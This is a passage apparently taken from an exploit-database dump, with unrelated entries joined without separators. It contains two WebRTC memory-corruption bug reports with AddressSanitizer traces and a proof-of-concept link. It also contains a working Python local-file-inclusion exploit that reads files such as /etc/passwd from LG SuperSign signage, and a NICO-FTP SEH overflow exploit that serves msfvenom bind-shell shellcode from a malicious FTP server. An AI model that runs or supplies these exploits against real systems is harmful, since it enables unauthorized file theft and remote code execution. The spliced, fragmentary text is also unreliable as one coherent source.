READ of size 1 at 0x61b003b7ff70 thread T15 (Chrome_libJingl)
#0 0x55e01a250cd0 in XorPayloads third_party/webrtc/modules/rtp_rtcp/source/forward_error_correction.cc:615:34
#1 0x55e01a250cd0 in webrtc::ForwardErrorCorrection::RecoverPacket(webrtc::ForwardErrorCorrection::ReceivedFecPacket const&, webrtc::ForwardErrorCorrection::RecoveredPacket*) third_party/webrtc/modules/rtp_rtcp/source/forward_error_correction.cc:630
#2 0x55e01a251162 in webrtc::ForwardErrorCorrection::AttemptRecovery(std::__1::list<std::__1::unique_ptr<webrtc::ForwardErrorCorrection::RecoveredPacket, std::__1::default_delete<webrtc::ForwardErrorCorrection::RecoveredPacket> >, std::__1::allocator<std::__1::unique_ptr<webrtc::ForwardErrorCorrection::RecoveredPacket, std::__1::default_delete<webrtc::ForwardErrorCorrection::RecoveredPacket> > > >*) third_party/webrtc/modules/rtp_rtcp/source/forward_error_correction.cc:652:12
#3 0x55e01a251b12 in webrtc::ForwardErrorCorrection::DecodeFec(webrtc::ForwardErrorCorrection::ReceivedPacket const&, std::__1::list<std::__1::unique_ptr<webrtc::ForwardErrorCorrection::RecoveredPacket, std::__1::default_delete<webrtc::ForwardErrorCorrection::RecoveredPacket> >, std::__1::allocator<std::__1::unique_ptr<webrtc::ForwardErrorCorrection::RecoveredPacket, std::__1::default_delete<webrtc::ForwardErrorCorrection::RecoveredPacket> > > >*) third_party/webrtc/modules/rtp_rtcp/source/forward_error_correction.cc:739:3
#4 0x55e01a4c5595 in webrtc::UlpfecReceiverImpl::ProcessReceivedFec() third_party/webrtc/modules/rtp_rtcp/source/ulpfec_receiver_impl.cc:248:11
#5 0x55e01a4a1bb9 in webrtc::RtpVideoStreamReceiver::ParseAndHandleEncapsulatingHeader(unsigned char const*, unsigned long, webrtc::RTPHeader const&) third_party/webrtc/video/rtp_video_stream_receiver.cc:419:23
#6 0x55e01a49f05b in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) third_party/webrtc/video/rtp_video_stream_receiver.cc:390:5
#7 0x55e01a49fcf2 in webrtc::RtpVideoStreamReceiver::OnRtpPacket(webrtc::RtpPacketReceived const&) third_party/webrtc/video/rtp_video_stream_receiver.cc:290:3
#8 0x55e009a368a1 in webrtc::RtpDemuxer::OnRtpPacket(webrtc::RtpPacketReceived const&) third_party/webrtc/call/rtp_demuxer.cc:157:11
#9 0x55e009a3b6e1 in webrtc::RtpStreamReceiverController::OnRtpPacket(webrtc::RtpPacketReceived const&) third_party/webrtc/call/rtp_stream_receiver_controller.cc:55:19
#10 0x55e01a231339 in webrtc::internal::Call::DeliverRtp(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) third_party/webrtc/call/call.cc:1321:36
#11 0x55e01a232300 in webrtc::internal::Call::DeliverPacket(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) third_party/webrtc/call/call.cc:1361:10
#12 0x55e01a95d341 in cricket::WebRtcVideoChannel::OnPacketReceived(rtc::CopyOnWriteBuffer*, rtc::PacketTime const&) third_party/webrtc/media/engine/webrtcvideoengine.cc:1441:26
#13 0x55e01a1d8dc2 in cricket::BaseChannel::ProcessPacket(bool, rtc::CopyOnWriteBuffer const&, rtc::PacketTime const&) third_party/webrtc/pc/channel.cc
#14 0x55e01a1f6760 in rtc::AsyncInvoker::OnMessage(rtc::Message*) third_party/webrtc/rtc_base/asyncinvoker.cc:45:22
#15 0x55e01a0a6aa1 in jingle_glue::JingleThreadWrapper::Dispatch(rtc::Message*) jingle/glue/thread_wrapper.cc:157:22
#16 0x55e01a0a7d7e in jingle_glue::JingleThreadWrapper::RunTask(int) jingle/glue/thread_wrapper.cc:279:7
#17 0x55e00d52b6f5 in Run base/callback.h:96:12
#18 0x55e00d52b6f5 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) base/debug/task_annotator.cc:101
#19 0x55e00d5881d5 in base::MessageLoop::RunTask(base::PendingTask*) base/message_loop/message_loop.cc:319:25
#20 0x55e00d589444 in DeferOrRunPendingTask base/message_loop/message_loop.cc:329:5
#21 0x55e00d589444 in base::MessageLoop::DoWork() base/message_loop/message_loop.cc:373
#22 0x55e00d591acf in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) base/message_loop/message_pump_default.cc:37:31
#23 0x55e00d600551 in base::RunLoop::Run() base/run_loop.cc:102:14
#24 0x55e00d6878b4 in base::Thread::ThreadMain() base/threading/thread.cc:337:3
#25 0x55e00d73c694 in base::(anonymous namespace)::ThreadFunc(void*) base/threading/platform_thread_posix.cc:76:13
#26 0x7fa3d586f493 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x7493)
0x61b003b7ff70 is located 0 bytes to the right of 1520-byte region [0x61b003b7f980,0x61b003b7ff70)
allocated by thread T15 (Chrome_libJingl) here:
#0 0x55e00607ef92 in operator new(unsigned long) /b/build/slave/linux_upload_clang/build/src/third_party/llvm/compiler-rt/lib/asan/asan_new_delete.cc:93:3
#1 0x55e01a4c3eeb in webrtc::UlpfecReceiverImpl::AddReceivedRedPacket(webrtc::RTPHeader const&, unsigned char const*, unsigned long, unsigned char) third_party/webrtc/modules/rtp_rtcp/source/ulpfec_receiver_impl.cc:101:26
#2 0x55e01a4a1b6f in webrtc::RtpVideoStreamReceiver::ParseAndHandleEncapsulatingHeader(unsigned char const*, unsigned long, webrtc::RTPHeader const&) third_party/webrtc/video/rtp_video_stream_receiver.cc:414:27
#3 0x55e01a49f05b in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) third_party/webrtc/video/rtp_video_stream_receiver.cc:390:5
#4 0x55e01a49fcf2 in webrtc::RtpVideoStreamReceiver::OnRtpPacket(webrtc::RtpPacketReceived const&) third_party/webrtc/video/rtp_video_stream_receiver.cc:290:3
#5 0x55e009a368a1 in webrtc::RtpDemuxer::OnRtpPacket(webrtc::RtpPacketReceived const&) third_party/webrtc/call/rtp_demuxer.cc:157:11
#6 0x55e009a3b6e1 in webrtc::RtpStreamReceiverController::OnRtpPacket(webrtc::RtpPacketReceived const&) third_party/webrtc/call/rtp_stream_receiver_controller.cc:55:19
#7 0x55e01a231339 in webrtc::internal::Call::DeliverRtp(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) third_party/webrtc/call/call.cc:1321:36
#8 0x55e01a232300 in webrtc::internal::Call::DeliverPacket(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) third_party/webrtc/call/call.cc:1361:10
#9 0x55e01a95d341 in cricket::WebRtcVideoChannel::OnPacketReceived(rtc::CopyOnWriteBuffer*, rtc::PacketTime const&) third_party/webrtc/media/engine/webrtcvideoengine.cc:1441:26
#10 0x55e01a1d8dc2 in cricket::BaseChannel::ProcessPacket(bool, rtc::CopyOnWriteBuffer const&, rtc::PacketTime const&) third_party/webrtc/pc/channel.cc
#11 0x55e01a1f6760 in rtc::AsyncInvoker::OnMessage(rtc::Message*) third_party/webrtc/rtc_base/asyncinvoker.cc:45:22
#12 0x55e01a0a6aa1 in jingle_glue::JingleThreadWrapper::Dispatch(rtc::Message*) jingle/glue/thread_wrapper.cc:157:22
#13 0x55e01a0a7d7e in jingle_glue::JingleThreadWrapper::RunTask(int) jingle/glue/thread_wrapper.cc:279:7
#14 0x55e00d52b6f5 in Run base/callback.h:96:12
#15 0x55e00d52b6f5 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) base/debug/task_annotator.cc:101
#16 0x55e00d5881d5 in base::MessageLoop::RunTask(base::PendingTask*) base/message_loop/message_loop.cc:319:25
#17 0x55e00d589444 in DeferOrRunPendingTask base/message_loop/message_loop.cc:329:5
#18 0x55e00d589444 in base::MessageLoop::DoWork() base/message_loop/message_loop.cc:373
#19 0x55e00d591acf in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) base/message_loop/message_pump_default.cc:37:31
#20 0x55e00d600551 in base::RunLoop::Run() base/run_loop.cc:102:14
#21 0x55e00d6878b4 in base::Thread::ThreadMain() base/threading/thread.cc:337:3
#22 0x55e00d73c694 in base::(anonymous namespace)::ThreadFunc(void*) base/threading/platform_thread_posix.cc:76:13
#23 0x7fa3d586f493 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x7493)
Thread T15 (Chrome_libJingl) created by T0 (chrome) here:
#0 0x55e00603bb7d in __interceptor_pthread_create /b/build/slave/linux_upload_clang/build/src/third_party/llvm/compiler-rt/lib/asan/asan_interceptors.cc:210:3
#1 0x55e00d73b99e in base::(anonymous namespace)::CreateThread(unsigned long, bool, base::PlatformThread::Delegate*, base::PlatformThreadHandle*, base::ThreadPriority) base/threading/platform_thread_posix.cc:115:13
#2 0x55e00d686be9 in base::Thread::StartWithOptions(base::Thread::Options const&) base/threading/thread.cc:112:15
#3 0x55e00d68684b in base::Thread::Start() base/threading/thread.cc:75:10
#4 0x55e01a09ba37 in content::PeerConnectionDependencyFactory::CreatePeerConnectionFactory() content/renderer/media/webrtc/peer_connection_dependency_factory.cc:177:3
#5 0x55e01a09b4d0 in content::PeerConnectionDependencyFactory::GetPcFactory() content/renderer/media/webrtc/peer_connection_dependency_factory.cc:139:5
#6 0x55e01a09df09 in content::PeerConnectionDependencyFactory::CreatePeerConnection(webrtc::PeerConnectionInterface::RTCConfiguration const&, blink::WebLocalFrame*, webrtc::PeerConnectionObserver*) content/renderer/media/webrtc/peer_connection_dependency_factory.cc:340:8
#7 0x55e01aa63b1b in content::RTCPeerConnectionHandler::Initialize(blink::WebRTCConfiguration const&, blink::WebMediaConstraints const&) content/renderer/media/webrtc/rtc_peer_connection_handler.cc:1333:50
#8 0x55e01baafde2 in blink::RTCPeerConnection::RTCPeerConnection(blink::ExecutionContext*, blink::WebRTCConfiguration const&, blink::WebMediaConstraints, blink::ExceptionState&) third_party/blink/renderer/modules/peerconnection/rtc_peer_connection.cc:585:23
#9 0x55e01baaaedc in blink::RTCPeerConnection::Create(blink::ExecutionContext*, blink::RTCConfiguration const&, blink::Dictionary const&, blink::ExceptionState&) third_party/blink/renderer/modules/peerconnection/rtc_peer_connection.cc:518:44
#10 0x55e01bb1ad0b in constructor gen/third_party/blink/renderer/bindings/modules/v8/v8_rtc_peer_connection.cc:1317:29
#11 0x55e01bb1ad0b in blink::V8RTCPeerConnection::constructorCallback(v8::FunctionCallbackInfo<v8::Value> const&) gen/third_party/blink/renderer/bindings/modules/v8/v8_rtc_peer_connection.cc:1667
#12 0x55e00ab4db49 in v8::internal::FunctionCallbackArguments::Call(v8::internal::CallHandlerInfo*) v8/src/api-arguments-inl.h:94:3
#13 0x55e00ab4a4c4 in v8::internal::MaybeHandle<v8::internal::Object> v8::internal::(anonymous namespace)::HandleApiCallHelper<true>(v8::internal::Isolate*, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::FunctionTemplateInfo>, v8::internal::Handle<v8::internal::Object>, v8::internal::BuiltinArguments) v8/src/builtins/builtins-api.cc:109:36
#14 0x55e00ab48eb3 in v8::internal::Builtin_Impl_HandleApiCall(v8::internal::BuiltinArguments, v8::internal::Isolate*) v8/src/builtins/builtins-api.cc:135:5
#15 0x55e00c2fce0d (/usr/local/google/home/natashenka/chromium3/src/out/asan/chrome+0xde74e0d)
#16 0x55e00c263d3f (/usr/local/google/home/natashenka/chromium3/src/out/asan/chrome+0xdddbd3f)
#17 0x7e9c7b70dd69 (<unknown module>)
#18 0x7e9c7b68868f (<unknown module>)
#19 0x55e00c2618a5 (/usr/local/google/home/natashenka/chromium3/src/out/asan/chrome+0xddd98a5)
#20 0x55e00c263c60 (/usr/local/google/home/natashenka/chromium3/src/out/asan/chrome+0xdddbc60)
#21 0x7e9c7b70dd69 (<unknown module>)
#22 0x7e9c7b68868f (<unknown module>)
#23 0x7e9c7b68868f (<unknown module>)
#24 0x7e9c7b68868f (<unknown module>)
#25 0x55e00c2618a5 (/usr/local/google/home/natashenka/chromium3/src/out/asan/chrome+0xddd98a5)
#26 0x55e00c265722 (/usr/local/google/home/natashenka/chromium3/src/out/asan/chrome+0xdddd722)
#27 0x7e9c7b684820 (<unknown module>)
#28 0x55e00b3b4130 in Call v8/src/simulator.h:113:12
#29 0x55e00b3b4130 in v8::internal::(anonymous namespace)::Invoke(v8::internal::Isolate*, bool, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*, v8::internal::Handle<v8::internal::Object>, v8::internal::Execution::MessageHandling, v8::internal::Execution::Target) v8/src/execution.cc:155
#30 0x55e00b3b3993 in CallInternal v8/src/execution.cc:191:10
#31 0x55e00b3b3993 in v8::internal::Execution::Call(v8::internal::Isolate*, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*) v8/src/execution.cc:202
#32 0x55e00aa107b4 in v8::Function::Call(v8::Local<v8::Context>, v8::Local<v8::Value>, int, v8::Local<v8::Value>*) v8/src/api.cc:5218:7
#33 0x55e015fe0a61 in blink::V8ScriptRunner::CallFunction(v8::Local<v8::Function>, blink::ExecutionContext*, v8::Local<v8::Value>, int, v8::Local<v8::Value>*, v8::Isolate*) third_party/blink/renderer/bindings/core/v8/v8_script_runner.cc:386:17
#34 0x55e016028398 in blink::V8EventListener::CallListenerFunction(blink::ScriptState*, v8::Local<v8::Value>, blink::Event*) third_party/blink/renderer/bindings/core/v8/v8_event_listener.cc:115:8
#35 0x55e016029a54 in blink::V8AbstractEventListener::InvokeEventHandler(blink::ScriptState*, blink::Event*, v8::Local<v8::Value>) third_party/blink/renderer/bindings/core/v8/v8_abstract_event_listener.cc:171:20
#36 0x55e01602942b in blink::V8AbstractEventListener::HandleEvent(blink::ScriptState*, blink::Event*) third_party/blink/renderer/bindings/core/v8/v8_abstract_event_listener.cc:120:3
#37 0x55e016029103 in blink::V8AbstractEventListener::handleEvent(blink::ExecutionContext*, blink::Event*) third_party/blink/renderer/bindings/core/v8/v8_abstract_event_listener.cc:108:3
#38 0x55e017446ebe in blink::EventTarget::FireEventListeners(blink::Event*, blink::EventTargetData*, blink::HeapVector<blink::RegisteredEventListener, 1ul>&) third_party/blink/renderer/core/dom/events/event_target.cc:804:15
#39 0x55e017445121 in blink::EventTarget::FireEventListeners(blink::Event*) third_party/blink/renderer/core/dom/events/event_target.cc:656:29
#40 0x55e017444d5b in blink::EventTarget::DispatchEventInternal(blink::Event*) third_party/blink/renderer/core/dom/events/event_target.cc:560:41
#41 0x55e017a0de87 in Create third_party/blink/renderer/core/events/progress_event.h:44:16
#42 0x55e017a0de87 in blink::FileReader::FireEvent(WTF::AtomicString const&) third_party/blink/renderer/core/fileapi/file_reader.cc:471
#43 0x55e017a0e6d4 in blink::FileReader::DidFinishLoading() third_party/blink/renderer/core/fileapi/file_reader.cc:427:3
#44 0x55e00a9494ef in blink::mojom::blink::BlobReaderClientStubDispatch::Accept(blink::mojom::blink::BlobReaderClient*, mojo::Message*) gen/third_party/blink/public/mojom/blob/blob.mojom-blink.cc:168:13
#45 0x55e00ea14f7e in mojo::InterfaceEndpointClient::HandleValidatedMessage(mojo::Message*) mojo/public/cpp/bindings/lib/interface_endpoint_client.cc:419:32
#46 0x55e00ea258b3 in mojo::internal::MultiplexRouter::ProcessIncomingMessage(mojo::internal::MultiplexRouter::MessageWrapper*, mojo::internal::MultiplexRouter::ClientCallBehavior, base::SequencedTaskRunner*) mojo/public/cpp/bindings/lib/multiplex_router.cc:865:42
#47 0x55e00ea2409e in mojo::internal::MultiplexRouter::Accept(mojo::Message*) mojo/public/cpp/bindings/lib/multiplex_router.cc:589:38
#48 0x55e00ea0efa7 in mojo::Connector::ReadSingleMessage(unsigned int*) mojo/public/cpp/bindings/lib/connector.cc:443:51
#49 0x55e00ea1081c in mojo::Connector::ReadAllAvailableMessages() mojo/public/cpp/bindings/lib/connector.cc:472:10
#50 0x55e00ea00642 in Run base/callback.h:125:12
#51 0x55e00ea00642 in mojo::SimpleWatcher::OnHandleReady(int, unsigned int, mojo::HandleSignalsState const&) mojo/public/cpp/system/simple_watcher.cc:274
#52 0x55e00d52b6f5 in Run base/callback.h:96:12
#53 0x55e00d52b6f5 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) base/debug/task_annotator.cc:101
#54 0x55e00c4afc95 in base::sequence_manager::internal::ThreadControllerImpl::DoWork(base::sequence_manager::internal::ThreadControllerImpl::WorkType) third_party/blink/renderer/platform/scheduler/base/thread_controller_impl.cc:166:21
#55 0x55e00d52b6f5 in Run base/callback.h:96:12
#56 0x55e00d52b6f5 in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) base/debug/task_annotator.cc:101
#57 0x55e00d5881d5 in base::MessageLoop::RunTask(base::PendingTask*) base/message_loop/message_loop.cc:319:25
#58 0x55e00d589444 in DeferOrRunPendingTask base/message_loop/message_loop.cc:329:5
#59 0x55e00d589444 in base::MessageLoop::DoWork() base/message_loop/message_loop.cc:373
#60 0x55e00d591acf in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) base/message_loop/message_pump_default.cc:37:31
#61 0x55e00d600551 in base::RunLoop::Run() base/run_loop.cc:102:14
#62 0x55e01bfb0599 in content::RendererMain(content::MainFunctionParams const&) content/renderer/renderer_main.cc:218:23
#63 0x55e00cafbca5 in content::RunZygote(content::ContentMainDelegate*) content/app/content_main_runner_impl.cc:567:14
#64 0x55e00caff751 in content::ContentMainRunnerImpl::Run() content/app/content_main_runner_impl.cc:969:10
#65 0x55e00cb1e6c3 in service_manager::Main(service_manager::MainParams const&) services/service_manager/embedder/main.cc:459:29
#66 0x55e00cafa2d0 in content::ContentMain(content::ContentMainParams const&) content/app/content_main.cc:19:10
#67 0x55e006081fe3 in ChromeMain chrome/app/chrome_main.cc:101:12
#68 0x7fa3ceac32b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
SUMMARY: AddressSanitizer: heap-buffer-overflow third_party/webrtc/modules/rtp_rtcp/source/forward_error_correction.cc:615:34 in XorPayloads
Shadow bytes around the buggy address:
0x0c3680767f90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3680767fa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3680767fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3680767fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c3680767fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c3680767fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[fa]fa
0x0c3680767ff0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c3680768000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c3680768010: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c3680768020: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c3680768030: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==109993==ABORTING
To reproduce this issue:
1) Apply new.patch to a fresh WebRTC tree
2) Build video_replay
3) Download the attached files and run ./video_replay --input_file fec
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45444.zip
# Exploit Title: LG SuperSign EZ CMS 2.5 - Local File Inclusion
# Date: 2018-09-13
# Exploit Author: Alejandro Fanjul
# Vendor Homepage: https://www.lg.com/ar/software-lg-supersign
# Version: SuperSign EZ (CMS)
# Tested on: Web OS 4.0
# CVE : CVE-2018-16288
# More info: http://mamaquieroserpentester.blogspot.com/2018/09/multiple-vulnerabilities-in-lg.html
# Any user can read files from the TV, without authentication due to an existing LFI in the following path:
# http://SuperSign_IP:9080/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd
# PoC
import requests
import re
from argparse import ArgumentParser
parser = ArgumentParser(description="SuperSign Reboot")
parser.add_argument("-t", "--target", dest="target",
help="Target")
parser.add_argument("-p", "--path", dest="filepath",
help="path to the file you want to read")
args = parser.parse_args()
path = args.filepath
s = requests.get('http://'+ str(args.target).replace('\n', '') +'/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'+str(path))
print s.text
# Exploit Title: NICO-FTP 3.0.1.19 - Buffer Overflow (SEH)
# Author: Abdullah Alıç
# Date: 2018-09-04
# Software link: https://en.softonic.com/download/nico-ftp/windows/post-download
# Tested Version: 3.0.1.19
# Vulnerability Type: Buffer Overflow (SEH)
# Tested on OS: Windows XP Professional SP3 x86 eng
import socket
import sys
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", 21))
s.listen(5)
#msfvenom -p windows/shell_bind_tcp -b "\x00\x0a\x0d" -f python
#355 bytes
buf = ""
buf += "\xba\xc6\xe4\x42\xd0\xd9\xea\xd9\x74\x24\xf4\x5e\x33"
buf += "\xc9\xb1\x53\x83\xc6\x04\x31\x56\x0e\x03\x90\xea\xa0"
buf += "\x25\xe0\x1b\xa6\xc6\x18\xdc\xc7\x4f\xfd\xed\xc7\x34"
buf += "\x76\x5d\xf8\x3f\xda\x52\x73\x6d\xce\xe1\xf1\xba\xe1"
buf += "\x42\xbf\x9c\xcc\x53\xec\xdd\x4f\xd0\xef\x31\xaf\xe9"
buf += "\x3f\x44\xae\x2e\x5d\xa5\xe2\xe7\x29\x18\x12\x83\x64"
buf += "\xa1\x99\xdf\x69\xa1\x7e\x97\x88\x80\xd1\xa3\xd2\x02"
buf += "\xd0\x60\x6f\x0b\xca\x65\x4a\xc5\x61\x5d\x20\xd4\xa3"
buf += "\xaf\xc9\x7b\x8a\x1f\x38\x85\xcb\x98\xa3\xf0\x25\xdb"
buf += "\x5e\x03\xf2\xa1\x84\x86\xe0\x02\x4e\x30\xcc\xb3\x83"
buf += "\xa7\x87\xb8\x68\xa3\xcf\xdc\x6f\x60\x64\xd8\xe4\x87"
buf += "\xaa\x68\xbe\xa3\x6e\x30\x64\xcd\x37\x9c\xcb\xf2\x27"
buf += "\x7f\xb3\x56\x2c\x92\xa0\xea\x6f\xfb\x05\xc7\x8f\xfb"
buf += "\x01\x50\xfc\xc9\x8e\xca\x6a\x62\x46\xd5\x6d\x85\x7d"
buf += "\xa1\xe1\x78\x7e\xd2\x28\xbf\x2a\x82\x42\x16\x53\x49"
buf += "\x92\x97\x86\xe4\x9a\x3e\x79\x1b\x67\x80\x29\x9b\xc7"
buf += "\x69\x20\x14\x38\x89\x4b\xfe\x51\x22\xb6\x01\x4c\xef"
buf += "\x3f\xe7\x04\x1f\x16\xbf\xb0\xdd\x4d\x08\x27\x1d\xa4"
buf += "\x20\xcf\x56\xae\xf7\xf0\x66\xe4\x5f\x66\xed\xeb\x5b"
buf += "\x97\xf2\x21\xcc\xc0\x65\xbf\x9d\xa3\x14\xc0\xb7\x53"
buf += "\xb4\x53\x5c\xa3\xb3\x4f\xcb\xf4\x94\xbe\x02\x90\x08"
buf += "\x98\xbc\x86\xd0\x7c\x86\x02\x0f\xbd\x09\x8b\xc2\xf9"
buf += "\x2d\x9b\x1a\x01\x6a\xcf\xf2\x54\x24\xb9\xb4\x0e\x86"
buf += "\x13\x6f\xfc\x40\xf3\xf6\xce\x52\x85\xf6\x1a\x25\x69"
buf += "\x46\xf3\x70\x96\x67\x93\x74\xef\x95\x03\x7a\x3a\x1e"
buf += "\x33\x31\x66\x37\xdc\x9c\xf3\x05\x81\x1e\x2e\x49\xbc"
buf += "\x9c\xda\x32\x3b\xbc\xaf\x37\x07\x7a\x5c\x4a\x18\xef"
buf += "\x62\xf9\x19\x3a"
nseh="\xEB\x80\x90\x90" # JMP BACK 128 bytes
seh="\x84\x12\x40\x00" #POP-POP-RETN null byte is trivial
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
egg = "\x54\x30\x30\x57" #W00T
junk = "\x90" * (2160-len(buf)-len(egghunter)) + egg + egg + buf +"\x90" * 100 + egghunter + "\x90" * 7 + "\xEB\x80\x90\x90" +"\x84\x12\x40\x00" #junk total 2283 bytes
buffer =junk
while True:
conn, addr = s.accept()
conn.send('220 Malicious FTP server!\r\n')
print(conn.recv(1024))
conn.send("331 OK\r\n")
print(conn.recv(1024))
conn.send('230 OK\r\n')
print(conn.recv(1024))
conn.send('220 "'+buffer+'" is current directory\r\n')
There is a use-after-free in VP9 processing in WebRTC. In the method RtpFrameReferenceFinder::ManageFrameVp9 the following code occurs:
auto gof_info_it = gof_info_.find((codec_header.temporal_idx == 0)
? codec_header.tl0_pic_idx - 1
: codec_header.tl0_pic_idx);
... // snip
info = &gof_info_it->second;
}
// Clean up info for base layers that are too old.
uint8_t old_tl0_pic_idx = codec_header.tl0_pic_idx - kMaxGofSaved;
auto clean_gof_info_to = gof_info_.lower_bound(old_tl0_pic_idx);
gof_info_.erase(gof_info_.begin(), clean_gof_info_to);
FrameReceivedVp9(frame->id.picture_id, info);
tl0_pic_idx is extracted from the incoming packet, and it if is higher than any picture id that exists in gof_info_, the entire vector will be erased, and info will be used in the call FrameReceivedVp9 even though it has been freed.
ASAN output:
==163231==ERROR: AddressSanitizer: heap-use-after-free on address 0x6060000031d0 at pc 0x0000014b0e1e bp 0x7ffe607dfd30 sp 0x7ffe607dfd28
READ of size 2 at 0x6060000031d0 thread T0
#0 0x14b0e1d in webrtc::video_coding::RtpFrameReferenceFinder::FrameReceivedVp9(unsigned short, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo*) modules/video_coding/rtp_frame_reference_finder.cc:569:31
#1 0x14ac2c5 in webrtc::video_coding::RtpFrameReferenceFinder::ManageFrameVp9(webrtc::video_coding::RtpFrameObject*) modules/video_coding/rtp_frame_reference_finder.cc:499:3
#2 0x14a7849 in ManageFrameInternal modules/video_coding/rtp_frame_reference_finder.cc:89:14
#3 0x14a7849 in webrtc::video_coding::RtpFrameReferenceFinder::ManageFrame(std::__1::unique_ptr<webrtc::video_coding::RtpFrameObject, std::__1::default_delete<webrtc::video_coding::RtpFrameObject> >) modules/video_coding/rtp_frame_reference_finder.cc:43
#4 0x148a87e in non-virtual thunk to webrtc::RtpVideoStreamReceiver::OnReceivedFrame(std::__1::unique_ptr<webrtc::video_coding::RtpFrameObject, std::__1::default_delete<webrtc::video_coding::RtpFrameObject> >) video/rtp_video_stream_receiver.cc:336:22
#5 0x1496f41 in webrtc::video_coding::PacketBuffer::InsertPacket(webrtc::VCMPacket*) modules/video_coding/packet_buffer.cc:130:31
#6 0x1487e59 in webrtc::RtpVideoStreamReceiver::OnReceivedPayloadData(unsigned char const*, unsigned long, webrtc::WebRtcRTPHeader const*) video/rtp_video_stream_receiver.cc:231:19
#7 0x12d9144 in webrtc::RTPReceiverVideo::ParseRtpPacket(webrtc::WebRtcRTPHeader*, webrtc::PayloadUnion const&, unsigned char const*, unsigned long, long) modules/rtp_rtcp/source/rtp_receiver_video.cc:109:26
#8 0x12cc80d in webrtc::RtpReceiverImpl::IncomingRtpPacket(webrtc::RTPHeader const&, unsigned char const*, unsigned long, webrtc::PayloadUnion) modules/rtp_rtcp/source/rtp_receiver_impl.cc:181:42
#9 0x1488e52 in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:399:20
#10 0x1488b03 in webrtc::RtpVideoStreamReceiver::OnRecoveredPacket(unsigned char const*, unsigned long) video/rtp_video_stream_receiver.cc:245:3
#11 0x14b925c in webrtc::UlpfecReceiverImpl::ProcessReceivedFec() modules/rtp_rtcp/source/ulpfec_receiver_impl.cc:244:35
#12 0x148bd42 in webrtc::RtpVideoStreamReceiver::ParseAndHandleEncapsulatingHeader(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:421:23
#13 0x1488d51 in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:390:5
#14 0x14899f8 in webrtc::RtpVideoStreamReceiver::OnRtpPacket(webrtc::RtpPacketReceived const&) video/rtp_video_stream_receiver.cc:290:3
#15 0x90c486 in webrtc::RtpDemuxer::OnRtpPacket(webrtc::RtpPacketReceived const&) call/rtp_demuxer.cc:157:11
#16 0x9131bd in webrtc::RtpStreamReceiverController::OnRtpPacket(webrtc::RtpPacketReceived const&) call/rtp_stream_receiver_controller.cc:55:19
#17 0x129940d in webrtc::internal::Call::DeliverRtp(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) call/call.cc:1321:36
#18 0x129a8d5 in webrtc::internal::Call::DeliverPacket(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) call/call.cc:1361:10
#19 0x61fe06 in webrtc::RtpReplay() video/replay.cc:279:31
#20 0x62337d in main video/replay.cc:343:3
